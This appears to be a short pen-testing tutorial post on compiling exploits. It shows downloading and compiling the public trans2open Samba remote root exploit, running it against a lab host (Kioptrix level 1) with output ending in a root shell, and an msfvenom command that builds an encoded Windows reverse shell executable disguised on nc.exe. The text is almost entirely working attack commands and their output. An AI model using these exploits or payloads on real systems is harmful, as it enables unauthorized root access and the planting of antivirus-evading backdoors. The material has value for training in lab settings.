November 5, 2019 · Basic Pen-Testing
9.2 : Pre exploitation - Compiling rootkits
Download & compile trans2open exploit
Example exploit in c language
curl https://www.exploit-db.com/download/10 > 10.c
gcc 10.c -o trans2open
trans2open -h
[email protected]:~/Desktop/exploits# ./trans2open -b 0 -v 192.168.56.103
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
id
uid=0(root) gid=0(root) groups=99(nobody)
^C
Example of reverse shell, with shikata_ga_nai encryption
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.56.101 LPORT=4444 \
-f exe -e x86/shikata_ga_nai \
-x /usr/share/windows-binaries/nc.exe \
-o shell3.exe